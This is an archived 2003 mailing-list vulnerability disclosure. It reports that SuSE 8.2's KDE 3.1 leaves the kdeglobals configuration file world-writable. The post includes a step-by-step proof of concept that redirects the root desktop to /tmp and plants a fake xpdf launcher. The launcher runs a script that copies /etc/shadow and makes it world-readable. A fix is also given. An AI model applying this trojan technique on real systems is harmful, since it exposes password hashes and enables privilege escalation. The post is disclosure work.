KDE 3.1 - Suse 8.2 - kdeglobals world writable

From: Martin Fallon (mar_fallon_at_yahoo.com.br)
Date: 11/14/03

  • Next message: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"
    Date: Fri, 14 Nov 2003 13:33:25 -0300 (ART)
    To: vuln-dev@securityfocus.com
    
    

    Hi, Mrs.!

    I have found one problem in suse 8.2 with KDE 3.1
    (default instalation in brazilian version). The
    configurarion file "kdeglobals" in
    /etc/opt/kde3/share/config is world writable.

    One attacker can exploit this vulnerability
    with many ways.

    One basic example of attack is:

    I - Overwrite de kdeglobals file with contents
    below:

    #
    # written by SuSEconfig.kde
    #
    [Locale]
    Country=pt
    Language=pt:BR

    #Abaixo jah alterados.

    [Paths]
    Desktop=/tmp/Desktop

    II - Create folder /tmp/Desktop e one trojan
    horse in some file .desktop inside then. Example:

    glaudson@suse:/tmp/Desktop> cat xpdf.desktop
    [Desktop Entry]
    Exec=/tmp/AutoStart/teste.sh
    Icon=gv
    TerminalOptions=
    Path=
    Type=Application
    Terminal=0
    X-KDE-StartupNotify=false
    glaudson@suse:/tmp/Desktop>

    II - Create file to execute /tmp/Autostart/teste.sh
    with backdoor/trojan/spyware/malware code.Example:

    glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh
    #!/bin/bash
    cp /etc/shadow /tmp/shadow
    chmod 0777 /tmp/shadow

    The icon "xpdf" will be appear in root's desktop.
    If root run de icon, he run the trojan horse and
    attack will be succeded.

    There are many other forms for exploit this bug.

    Solution:

    chmod 0500 /etc/opt/kde3/share/config/kdeglobals
    or
    rm -rf /etc/opt/kde3/share/config/kdeglobals

    There are again other files world writable
    in suse 8.2(brazilian version):

    glaudson@suse:/tmp/Desktop> find /etc/opt -perm -2 !
    \( -type l -o -type c -o -type s -o -perm -1000 \)
    /etc/opt/kde3/share/config/kmailrc
    /etc/opt/kde3/share/config/kioslaverc
    /etc/opt/kde3/share/config/kdeglobals.SuSEconfig
    /etc/opt/kde3/share/config/kdeglobals
    find: /etc/opt/kde3/share/servicetypes: Permissão
    negada

    glaudson@suse:/tmp/Desktop> cat /etc/SuSE-release
    SuSE Linux 8.2 (i586)
    VERSION = 8.2
    glaudson@suse:/tmp/Desktop> cat /proc/version
    Linux version 2.4.20-4GB-athlon (root@Athlon.suse.de)
    (gcc version 3.3 20030226 (prerelease) (SuSE Linux))
    #1 Mon Mar 17 17:56:47 UTC 2003

    Best Regards,

    Martin Fallon.
    Mercenarie's Club
    http://cdm.frontthescene.com.br/

    ______________________________________________________________________

    Yahoo! Mail: 6MB, anti-spam e antivírus gratuito! Crie sua conta agora:
    http://mail.yahoo.com.br


  • Next message: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"

    Relevant Pages

    • Re: Novell buying Suse, IBM investing in Novell
      ... >Suse produces what I regard as the most mature Linux packages. ... but also the attack op propiarty Unix variants. ... IBM may need to kick some Novell butt to keep them from just throwing Suse's ...
      (comp.os.vms)
    • Novell buying Suse, IBM investing in Novell
      ... I read an article today that Novell is going to buy Suse, ... Suse produces what I regard as the most mature Linux packages. ... but also the attack op propiarty Unix variants. ...
      (comp.os.vms)